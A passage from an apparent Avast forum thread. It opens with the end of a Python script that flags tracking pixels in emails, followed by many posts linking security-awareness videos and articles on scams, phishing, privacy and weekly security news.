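    collector = _ImgCollector()
    collector.feed(_html_body(raw_email))
    findings = []
    for attrs in collector.images:
        src = attrs.get("src") or ""
        url = urlparse(src)
        if url.scheme not in ("http", "https"):
            continue  # inline (cid:/data:) images do not phone home
        reasons = ["remote image: fetching it confirms the address is live"]
        if _is_tiny(attrs):
            reasons.append("1x1 pixel")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        token_like = any(
            len(v) >= 8 and v.isalnum()
            for values in parse_qs(url.query).values()
            for v in values
        )
        if token_like:
            reasons.append("opaque per-recipient token in query string")
        findings.append(
            {"src": src, "host": url.hostname, "reasons": reasons, "suspicious": len(reasons) > 1}
        )
    return findings


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_EMAIL):
        flag = "BEACON?" if finding["suspicious"] else "image  "
        print(f"{flag} {finding['host']}: {'; '.join(finding['reasons'])}")
```

Run it against a message saved as raw text (for example via "Show original" in a webmail client); a mail client that blocks remote images by default achieves the same protection without needing to inspect anything, which is the setting to check first.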
-
Weekly Security News Roundup w/e 12-30-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/30/16/44/c3lvDEVwVMF/preview.jpg)
https://youtu.be/QREK7u81mt8 (https://youtu.be/QREK7u81mt8)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Stay Protected in 2023 with these 9 Cybersecurity Tips
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/02/02/01/c0VnnVVweMH/preview.jpg)
https://youtu.be/D1gkBS8atpA (https://youtu.be/D1gkBS8atpA)
As new technology emerges, cybersecurity protocols also evolve.
The following are some basic tips you should carry with you everywhere to stay better protected against cyber attacks.
Here are some general rules to follow to stay safe in 2023.
My thanks to an article in How-To Geek for the inspiration for this video.
You can read the whole article at: https://bit.ly/3IhUPZc (https://bit.ly/3IhUPZc)
-
Weekly Security News Roundup w/e 1-6-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/06/09/52/c0V1QsVwool/preview.jpg)
https://youtu.be/s9Gihl71VGM (https://youtu.be/s9Gihl71VGM)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Antivirus Exception? Think Twice
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/13/17/18/c0VIbFVwans/preview.jpg)
https://youtu.be/tJww9LIyjt0 (https://youtu.be/tJww9LIyjt0)
Think twice before you add anything to exceptions,
even if an antivirus detection dialogue annoys you in the moment.
My thanks to the Avast Threat Labs for their inspiration for this video.
https://blog.avast.com/exceptions-risks (https://blog.avast.com/exceptions-risks)
-
Weekly Security News Roundup w/e 1-13-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/13/23/40/c0VI0kVwa80/preview.jpg)
https://youtu.be/Auc8G3SyaEM (https://youtu.be/Auc8G3SyaEM)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Scammers are targeting online secondhand shopping platforms
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/16/04/26/c0VDfOVwBk7/preview.jpg)
https://youtu.be/n33dLD8Cjew (https://youtu.be/n33dLD8Cjew)
In general, we don’t need to look much further than popular places where people do business
to find cybercriminals and scammers perpetrating their crimes. I’m about to dive into a case
of theft that took place on Vinted’s platform, but this kind of crime could have started in many
different marketplaces of this kind. My thanks to Luis Corrons for his information on this topic.
You’ll find his article here: https://bit.ly/3XAmqZO (https://bit.ly/3XAmqZO)
-
What's on the Dark Web in 2023?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/18/23/13/c0VF0IVwJ5m/preview.jpg)
https://youtu.be/57ILheI0NB4 (https://youtu.be/57ILheI0NB4)
The vast majority of what we know and use daily is the "surface web,"
which includes all the sites that can be easily accessed through a search engine like Google or Bing.
But beyond the surface web lies a much larger and mysterious realm known as the "deep web."
And within that deep web lies an even more secretive and controversial corner of the internet
known as the "dark web." My thanks to Emma McGowan for her excellent article on the Avast Blog
and the inspiration for this video. https://bit.ly/3ks2qul (https://bit.ly/3ks2qul)
-
Weekly Security News Roundup w/e 1-20-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/20/23/16/c0VY0DVwNHw/preview.jpg)
https://youtu.be/L8dxCV4ftmw (https://youtu.be/L8dxCV4ftmw)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Security News Flash - T-Mobile Hacked Again
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/20/22/28/c0VY3uVwNp8/preview.jpg)
https://youtu.be/xtdm1heBZY0 (https://youtu.be/xtdm1heBZY0)
T-Mobile has admitted that hackers were able to steal the information
of around 37 million postpaid and prepaid customers in another major data breach.
The carrier said in a regulatory filing that it discovered the issue on January 5th.
Read more at Engadget - https://engt.co/3QSxxeG (https://engt.co/3QSxxeG)
-
What are the risks of malicious USBs?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/26/23/19/c0VO0qVx6gN/preview.jpg)
https://youtu.be/j9Zg8BU6ADg (https://youtu.be/j9Zg8BU6ADg)
USB flash drives are still a common way for attackers to infect computers with viruses and malware.
They can damage your devices and data in seconds. If you think this can't happen to you, think again!
My thanks to an Avast Blog article for inspiration for this video (Author unknown):
https://blog.avast.com/malicious-usb-devices (https://blog.avast.com/malicious-usb-devices)
-
AI in cybersecurity - The good, the bad, and the ugly
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/27/16/11/c0VtDXVxlLR/preview.jpg)
https://youtu.be/XC1SJFIAXE8 (https://youtu.be/XC1SJFIAXE8)
AI technology has advanced to the level that it’s now at a pivotal point.
My thanks to Luis Corrons for his excellent article and the inspiration for this video.
You’ll find his article on the Avast Blog at the following link: https://blog.avast.com/ai-cybersecurity (https://blog.avast.com/ai-cybersecurity)
-
Weekly Security News Roundup w/e 1-27-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/27/23/32/c0Vt0xVx2fK/preview.jpg)
https://youtu.be/M7U_aC8cocQ (https://youtu.be/M7U_aC8cocQ)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
-
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
bob, is the avast link in your post above the one that you intended?
-
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
bob, is the avast link in your post above the one that you intended?
Avast Free - Yes
-
Is ChatGPT's use of people's data even legal?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/01/20/06/c0nVY1Vxt7Y/preview.jpg)
https://youtu.be/8IKco-yzLhE
Currently, there is no widely accepted method for individuals to request the removal
of their data from a machine learning model once it has been used to train the model.
My thanks to Emma McGowan for her excellent article on this topic in the Avast Blog
and the inspiration for this video. You’ll find her article at the following link:
https://blog.avast.com/chatgpt-data-use-legal (https://blog.avast.com/chatgpt-data-use-legal)
-
Weekly Security News Roundup w/e 2-3-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/04/00/19/c0nfcqVxaHB/preview.jpg)
https://youtu.be/TVIQq1Bf8h8
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Kaspersky mentions that Google and MailChimp are the most aggressive trackers on the Interwebz.
Re: https://securelist.com/web-beacons-on-websites-and-in-email/108632/
polonus
-
10 expert tips for filing taxes online without getting your identity stolen
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/09/19/47/c0nQqHVxsSH/preview.jpg)
https://youtu.be/BnPRLkQBzH4 (https://youtu.be/BnPRLkQBzH4)
Filing your taxes doesn't have to be a stressful experience – with a little bit of planning
and preparation, you can get your taxes done quickly and safely. My thanks to Emma McGowan
for her excellent article in the Avast Blog on this topic and for the inspiration for this video.
You’ll find her article at the following link: https://blog.avast.com/tips-filing-taxes-online (https://blog.avast.com/tips-filing-taxes-online)
-
Weekly Security News Roundup w/e 2-10-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/10/16/37/c0n6DAVx8cy/preview.jpg)
https://youtu.be/O1c2JzI_eFQ
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Safe dating in the digital age
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/12/14/19/c0nl2qVxR18/preview.jpg)
https://youtu.be/8hWvQdJf59k (https://youtu.be/8hWvQdJf59k)
Romance scams are at an all time high.
This Valentine's Day, keep your online dating life fun and romantic.
Follow these safety tips. My thanks to Malea Lamb-Hall for her article on the Avast blog
and the inspiration for this video. You’ll find her article here:
https://blog.avast.com/online-dating-safety-tips-avast (https://blog.avast.com/online-dating-safety-tips-avast)
-
Smishing: The elephant in the room
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/12/17/41/c0nlbpVxR3q/preview.jpg)
https://youtu.be/llHdk44d-I4 (https://youtu.be/llHdk44d-I4)
It's important to be vigilant and cautious when receiving text messages from unknown or unexpected sources.
My thanks to Luis Corrons for his inspirational article on this topic which you’ll find here: https://bit.ly/3jOYDqU (https://bit.ly/3jOYDqU)
-
Weekly Security News Roundup w/e 2-17-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/17/20/40/c0nbYkVyD6A/preview.jpg)
https://youtu.be/-i6FT0qsre8 (https://youtu.be/-i6FT0qsre8)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Website redirect issues hamper hosting provider GoDaddy:
https://aboutus.godaddy.net/newsroom/company-news/news-details/2023/Statement-on-recent-website-redirect-issues/default.aspx
Not the first time around this happens at GoDaddy :(
polonus
-
What is Phishing and can you Protect against it?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/19/15/26/c0nqoOVyFGx/preview.jpg)
https://youtu.be/5rAYNlsIxsI (https://youtu.be/5rAYNlsIxsI)
Find out what Phishing is and how to protect against becoming a victim.
I used both ChatGPT and Pictory.ai in the creation of this video.
ChatGPT supplied the answer to the question I posed. Pictory.ai created the video.
I used my voice for the narration and Screencast-O-Matic for the editing.
-
ENISA warns - https://cert.europa.eu/blog/sustained-activity-by-specific-threat-actors
Information-stealing spy groups, like APT27, APT30, APT31, Ke3chang, Gallium and Mustang Panda,
attack government institutions. Avoid common mistakes in incident handling.
Re: https://cert.europa.eu/files/data/TLP-CLEAR-JointPublication-23-01.pdf
polonus
-
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
bob, is the avast link in your post above the one that you intended?
Avast Free - Yes
I just want to clarify, does it make sense to switch to the paid version, or will the level of security remain the same?
-
Focused View, turning TikTok into a privacy nightmare:
https://www.tiktok.com/business/en/blog/tiktok-world-focused-view
Warnings against it here:
https://edri.org/our-work/tiktoks-focused-view-the-creepy-new-feature-aims-to-monetise-your-emotions/
polonus
-
Weekly Security News Roundup w/e 2-24-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/24/16/46/c0nZDmVyz7K/preview.jpg)
https://youtu.be/ONvMlOoiNFg
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Some Timely Advice from Avast
https://youtu.be/EdlA44kizOo
Avast is warning about trusting Google's search results.
-
Weekly Security News Roundup w/e 3-3-2023
https://youtu.be/EWy5JbcleBk
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Scammers are using AI voices to steal millions by impersonating loved ones
https://youtu.be/rO5nuv-EVD0
Over 5,000 victims were conned out of their money through the phone in 2022.
AI voice-generating software is allowing scammers to mimic the voice of loved ones.
Credit for the information in this video belongs to Ryan McNeal for his article in
Android Authority. Read his article by following the link listed. https://bit.ly/3kUIZuG
-
Weekly Security News Roundup w/e 3-10-2023
https://youtu.be/XjZyIbZmrSg
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Stalkerware Has Grown by 239% Worldwide
https://youtu.be/gricighW--g
Stalkerware is often installed secretly on mobile phones by abusive spouses,
ex-partners, and other close contacts to spy on their targets.
My thanks to Avast for their article on this topic. You'll find it at:
https://blog.avast.com/worldwide-stalkerware-trends
-
Weekly Security News Roundup w/e 3-17-2023
https://youtu.be/ZFAwMTpHIOY
This week's important Security News gathered from many sources across the internet.
My Thanks to Avast : https://www.avast.com/en-us/about#pc
Links to the articles referenced in this video are part of the video show notes.
-
Amazon Call Scams Are On The Rise
https://youtu.be/UmLZtLWb48k
Here’s what you need to know to recognize these scams and keep your information safe.
My thanks to Emma McGowan for her article on this topic and the catalyst for this video.
Read her entire article here: https://blog.avast.com/amazon-call-scams
-
Amazon Call Scams Are On The Rise
<snip image>
https://youtu.be/UmLZtLWb48k
Here’s what you need to know to recognize these scams and keep your information safe.
My thanks to Emma McGowan for her article on this topic and the catalyst for this video.
Read her entire article here: https://blog.avast.com/amazon-call-scams
I would be suspect of any call asking for this information:
"Has someone claiming to be an account executive from Amazon ever called asking for your Amazon account number, etc."
I would hope any real Amazon account executive would already have this account number information, as I haven't got a clue what it is :)
Even so if I ever got something like this my first action (after hanging up) would be to check my orders.
-
Weekly Security News Roundup w/e 3-24-2023
https://youtu.be/_5v2wNWeb5c
This week's important Security News gathered from many sources across the internet.
My Thanks to Avast for their support: https://www.avast.com/en-us/index#pc
Links to the articles referenced in this video are part of the video show notes.
-
Instagram "Shein Gift Card Scam" - It can happen to YOU
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/25/12/09/c0eTlQVacx4/preview.jpg)
In yesterday's edition of the "Weekly Security News Roundup"
the section on the Must Read on the Avast Blog featured an article
by Luis Corrons (https://blog.avast.com/author/luis-corrons) who is a very knowledgeable Avast Security Evangelist on this very topic.
In this morning's email, I received this very well documented scam email in my inbox.
Here are some of the screenshots I took to hopefully help you
be more aware that this could also be sent to you. Don't fall for the scam.
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/25/12/11/c0eTlXVacxz/preview.jpg)
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/25/12/21/c0eTlrVacxR/preview.jpg)
You are a winner if you place this email in the SPAM folder.
You are a loser if you click on the button.
Paying attention to great advice helps you be aware of the dangers.
Ultimately, it's still up to you to follow that advice or not.
Stay safe. Dangers are all around us. Be aware and follow the advice offered.
-
6 Tricks That Won’t Secure Your Wi-Fi (And 6 That Will)
https://youtu.be/w-jua3xi4H4
There are a lot of Wi-Fi security tips that don't secure your Wi-Fi network against intrusion.
So, skip them and focus on the security-enhancing tips and tricks that do.
Thanks to Jason Fitzpatrick for his helpful article which prompted this video.
Please read his full article at: https://tinyurl.com/2ovgnb3m
-
Weekly Security News Roundup w/e 3-31-2023
https://youtu.be/z24Zl1rjVsQ
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
A VPN Offers Protection Against The Eight Most Common Hacks
https://youtu.be/GpNghVISyGE
Your basic protection should include an Antivirus, a Firewall, a Password Manager, and a VPN.
I use Avast for my Antivirus, the Firewall that's part of Windows 11, Dashlane for my Password Manager,
and the Google One VPN. See the Video Show notes for the links mentioned in the video.
-
Weekly Security News Roundup w/e 4-7-2023
https://youtu.be/1OMfGoy4-a0
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Cyber spring cleaning: Maintaining your digital home
https://youtu.be/pW4-yC0WOVw
A year-round cyber cleaning routine will ensure a peace of mind.
My thanks to Emma McGowan for her excellent article
which was the inspiration for this video.
You'll find her article here: https://tinyurl.com/2dl5ql4o
You'll find Avast's products here: https://www.avast.com/en-us/store#pc
-
Two Factor Authentication (2FA): Why use it — What are the best options?
https://youtu.be/KU8pLA7UfEc
Your passwords will be stolen. It’s not a matter of “if,” it is a matter of “when” and “how many times.”
To stay safe, remember, 1+1=2FA
My thanks to Luis Corrons for his insight on this topic.
Find out more about Luis and his articles at https://tinyurl.com/2k5oxcba
-
Weekly Security News Roundup w/e 4-14-2023
https://youtu.be/m6nDIa2Y5ig
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Cyber spring cleaning
https://youtu.be/HF2EsHAGoqI
From daily routines to monthly rituals, here’s to your cyber health!
My thanks to Emma McGowan for her excellent article on this topic.
You'll find her article here: https://blog.avast.com/digital-home-hygiene-checklist
-
Weekly Security News Roundup w/e 4-21-2023
https://youtu.be/glhBx4stVg0
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
A Microsoft Edge feature is sharing the sites you visit with Bing
https://youtu.be/fLPqZhFkSLY
A potential privacy issue in Edge. This needs to be addressed ASAP.
If you don't want to pass all the websites you visit in Edge onto Bing,
make this change now.
-
Weekly Security News Roundup w/e 4-28-2023
https://youtu.be/JvH2ZCfVKYg
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 5-5-2023
https://youtu.be/qFWskv7XMKg
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 5-12-2023
https://youtu.be/sbbsaxvLt7I
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Actively abused XSS-hole within WordPress Custom Fields plug-in.
Re: https://www.akamai.com/blog/security-research/attackers-leverage-sample-exploit-wordpress-plugin
polonus
-
Weekly Security News Roundup w/e 5-19-2023
https://youtu.be/WxC659wwoMg
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 5-26-2023
https://youtu.be/hf3OcP7855c
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
AI - Are We at Risk or Another Doomsday Theory?
https://youtu.be/foXT_o9GJlM
I spotted and read the following article yesterday:
https://www.safe.ai/statement-on-ai-risk
You can even sign their petition if you agree with their point of view.
You'll not find my name on that petition.
Is this new AI revolution really going to cause the end of Civilization?
If it is, I'm in trouble.
-
Weekly Security News Roundup WE 6-2-2023
https://youtu.be/cghQGkGJH1Y
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 6-9-2023
https://youtu.be/8rM5Ui1SjY8
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Your essential cybersecurity checklist for safe summer travel
https://youtu.be/l10kh5M8ZH8
Here is a checklist to put together ahead of your summer travels.
Following that list will ensure a safe and enjoyable summer vacation.
My thanks to my friend Luis Corrons for his article which prompted this video.
You'll find his article at https://tinyurl.com/248m868z
You can get Avast's SecureLine VPN at: https://www.avast.com/secureline-vpn#pc
-
Can't find a thread to post this in so I will post here.
I am tired of Avast blocking my downloads from a number of sites because it says they contain URL blacklist. I have been using these sites for years, long before I used Avast, and they are legit sites. Now I have to disable Avast so I can download my files or updates to files or download other files from legit sites.
There should be an option to add the sites to a safe list
-
Can't find a thread to post this in so I will post here.
I am tired of Avast blocking my downloads from a number of sites because it says they contain URL blacklist. I have been using these sites for years, long before I used Avast, and they are legit sites. Now I have to disable Avast so I can download my files or updates to files or download other files from legit sites.
There should be an option to add the sites to a safe list
You should start your own 'new topic' as it is unique to you and your problem. This one is very active and your post will just get buried in the nearly 7000 posts.
Give some examples of the problem domain name/s only not active links (to avoid accidental exposure to suspect site/s), a screen shot attached to the post, with the Details option selected would be helpful.
-
Weekly Security News Roundup w/e 6-16-2023
https://youtu.be/Jq93nVNQe24
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Virus definition updates for Avast version 9/10/11 end in summer 2023
https://blog.avast.com/virus-definition-updates-eol
It's time to update that OUTDATED version.
-
Virus definition updates for Avast version 9/10/11 end in summer 2023
https://blog.avast.com/virus-definition-updates-eol
It's time to update that OUTDATED version.
Interesting, I know someone in the forums that isn't going to like that (still on Avast 10)!
But what I'm unsure about is how the various different Avast program versions differ in the delivery of the virus definitions to make this necessary. Or are avast considering a new/different delivery system for updates or a major update of the VPS to perhaps give better detections or optimize them again.
I notice from the blog post that it is only offering information on how to update to the latest version. For many the reason they are using older versions is the operating system/computer they are using. Perhaps they need to consider making the off-line update for version 12 and above.
-
Weekly Security News Roundup WE 6-23-2023
https://youtu.be/Rmud9C55Lgc
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Avast Researchers Uncover Disturbing Crowdfunding Scheme
https://youtu.be/v3dR3Vgoogs
The scam involves a series of emotionally charged video ads that are shared on YouTube and
Instagram. They hope you'll fall for the scam and donate.
My thanks to Emma McGowan for her article which you'll find at: https://tinyurl.com/23m5grbm
-
Weekly Security News Roundup w/e 6-30-2023
https://youtu.be/ohPWQSR4kOE
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 7-7-2023
https://youtu.be/s194eWaRKjY
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 7-14-2023
https://youtu.be/ZZ2Lx7q9gAc
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Unmasking HotRat The hidden dangers in your software downloads
https://youtu.be/KN9XfhiqRX4
Avast researchers have unmasked a sneaky little rat in illegal versions of cracked software.
His name is HotRat and he's coming for your personal info.
My thanks to Luis Corrons for his excellent article and the inspiration for this video.
You'll find his article at https://tinyurl.com/2jkpt67x
-
Weekly Security News Roundup WE 7-21-2023
https://youtu.be/XlZVZtTzP4E
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Don't Get Hooked - How to Spot Amazon Phishing Scams
https://youtu.be/ddIRpuPE8zs
Phishing scams are like a wolf in sheep's clothing.
Don't let the scammer take a bite out of you or your wallet.
-
Weekly Security News Roundup WE 7-28-2023
https://youtu.be/yAKzPIHmhlE
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Cybersecurity for Dummies
https://youtu.be/voEjE0hzci0
A short tutorial directed at Cybersecurity Education.
I used a trial version of Slideoo (https://slideoo.ai/)
to aid in the creation of this video.
I made a lot of modifications to the Slideoo creation, but it was helpful
and made the creation of the PowerPoint presentation easier.
I then used ZOOM and ScreenPal in converting the PowerPoint presentation
into a video.
This process does not alter or destroy the PowerPoint creation.
I simply use the PowerPoint presentation as the background image of the video.
-
eBooks are cheap, but you might pay in other ways
https://youtu.be/oNMmq2qeRPM
Everyone is looking for a deal on textbooks this back-to-school season.
You know it, but so do the scammers. Here's what to look out for with eBook scams.
You'll find the Avast Blog entry at https://blog.avast.com/back-to-school-ebook-scams
-
Weekly Security News Roundup WE 8-4-2023
https://youtu.be/idedi7AQkV8
This week's important Security News gathered from many sources across the internet.
-
I've received several of these over the past few days.
The sender varies but the phishing attempt is the same.
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/08/22/00/c0jj3cVkM3d/preview.jpg)
If you get this, put it in the spam folder where it belongs.
-
New report shows surprising shift in cyber crime
https://youtu.be/L6e_7N2yVgo
Something is changing in the world of cybersecurity.
Social engineering, and web-related threats, such as scams, phishing,
and malvertising, surged dramatically.
My thanks to Luis Corrons for this information.
You'll find his article at https://tinyurl.com/23h98zxj
-
Weekly Security News Roundup WE 8-11-2023
https://youtu.be/EUCgKgruN8s
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
The Deceptive World of Web-based Adware
https://youtu.be/I61Mj5NpVpA
According to the Avast Q2 2023 Threat Report, it's evident that adware has made quite
a splash. My thanks to Emma McGowan for her informative article.
You can find her article at: https://tinyurl.com/2cpcvvud
-
Weekly Security News Roundup WE 8-18-2023
https://youtu.be/oVbOS3rbhXI
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Fleeceware drains your money slowly over time - Here is how to spot it
https://youtu.be/_0pm177a1YU
Hidden somewhere among your charges could be an instance of fleeceware.
Today we’re going to look at the financial damage that legitimate and criminal
efforts can cause when we’re not paying attention to small charges.
My thanks to Emma McGowan of Avast for her article which you'll find at:
https://blog.avast.com/how-to-spot-fleeceware
-
Weekly Security News Roundup WE 8-25-2023
https://youtu.be/BRBm_96iEmk
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Triangulation Fraud - The Inside Scoop
https://youtu.be/kV46Y2IFOCs
There’s a popular scheme that targets online shoppers.
But are you savvy enough to spot this scam?
Read Emma McGowan's article which prompted this video at
https://tinyurl.com/2a6wmhle
-
Weekly Security News Roundup WE 9-1-2023
https://youtu.be/Q_v0sJsRbRE
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 9-8-2023
https://youtu.be/ZO4stmk_G3k
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 9-15-2023
https://youtu.be/hahOqHOWJj0
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Browser Push Notifications are on the rise
https://youtu.be/G6yK8l3MCG8
Here is some timely and important information from Avast (https://blog.avast.com/tag/threat-research)
to help you control this latest increasing potential threat.
-
Hackers and scammers target classrooms with ransomware
https://youtu.be/0l2hpRVtLTM
In the last few years, hackers have set their sights on an unexpected target:
our school districts and classrooms. Cybercriminals see educational institutions
as lucrative targets for fraud and scams.
My thanks to Emma McGowan for her excellent article which you can find at:
https://blog.avast.com/hackers-and-scammers-target-classrooms
-
Weekly Security News Roundup WE 9-22-2023
https://youtu.be/mYVOtE-nlyA
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
What is a Digital Identity - Updated
https://youtu.be/w-4PmX0oK3E
My thanks to Emma McGowan for the inspiration of this video.
You'll find her article at https://tinyurl.com/y3yphfwj
-
Involved in a data breach - Here’s what you need to know
https://youtu.be/UodmahIfMWg
Here are some tips which will help you if you're involved in a data breach.
My thanks to Anna Branding for her article on this topic which appeared
on the Malwarebytes Blog.
You'll find her article at: https://tinyurl.com/2cr7tv88
-
RATs, rootkits, and ransomware
https://youtu.be/nm-YdRaFa0k
Disturbing highlights from the latest Avast Threat Report indicate scammers
aren’t just stealing from your computer — they’re working to take it over entirely.
My thanks to Emma McGowan for her article and this video's inspiration.
You'll find her article at - https://tinyurl.com/29ah96mh
-
5 Social Security scams and how to avoid them
https://youtu.be/aUECjY7toTg
Scammers are constantly devising new ways to exploit this system for their gain,
putting your hard-earned retirement savings at risk.
I based this video on an article from Angelica Leicht.
Please read her full article at https://tinyurl.com/2dlmlpkx
-
Google fixes fifth actively exploited Chrome zero-day of 2023
https://www.bleepingcomputer.com/news/security/google-fixes-fifth-actively-exploited-chrome-zero-day-of-2023/
-
Weekly Security News Roundup WE 9-29-2023
https://youtu.be/InrmGKq-6_g
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Most dangerous vulnerability found in curl so far:
https://github.com/curl/curl/discussions/12026
On Wednesday 11th next a patch for CVE-2023-38545 will arrive.
polonus
-
Thousands of WordPress websites vulnerable through particular plug-in.
Re: https://blog.sucuri.net/2023/10/balada-injector-targets-unpatched-tagdiv-plugin-newspaper-theme-wordpress-admins.html
polonus
-
Weekly Security News Roundup WE 10-13-2023
https://youtu.be/8Iu5tcU9s6E
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Approx. 200.000 WordPress websites warned against a threat, websites vulnerable since August last.
Read: https://www.wordfence.com/blog/2023/10/psa-critical-unauthenticated-arbitrary-file-upload-vulnerability-in-royal-elementor-addons-and-templates-being-actively-exploited/ (source - Chloe Chamberland - Oct. 13 last)
polonus
-
Your next online dating match might actually be ChatGPT
https://youtu.be/OrZF1uVrlHI
Researchers at Avast have uncovered a romance scam that utilizes
ChatGPT to increase the believability of their online dating conversations.
My thanks to Luis Corrons for his article on this topic. You'll find the article at:
https://blog.avast.com/your-next-online-dating-match-might-actually-be-chatgpt
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/18/14/15/c06F2oVE6OF/preview.jpg)
-
Cybercriminals are using AI tools to make phishing easier
https://youtu.be/jBc_mX_VSz0
Humans are still king when it comes to writing convincing phishing emails—but generative AI tools
could be making it easier for attackers to automate customized phishing campaigns at scale.
My thanks to Tom McKay of IT Brew for his article and the inspiration of this video.
You'll find his article at - https://tinyurl.com/yty7kcbb
-
Phishing - The big nemesis
https://youtu.be/KYAjz9_6oiU
Phishing - There are several types. Don't become a victim. Avast can help!
https://www.avast.com/en-us/free-antivirus-download#pc
-
Here's another candidate for the SPAM folder:
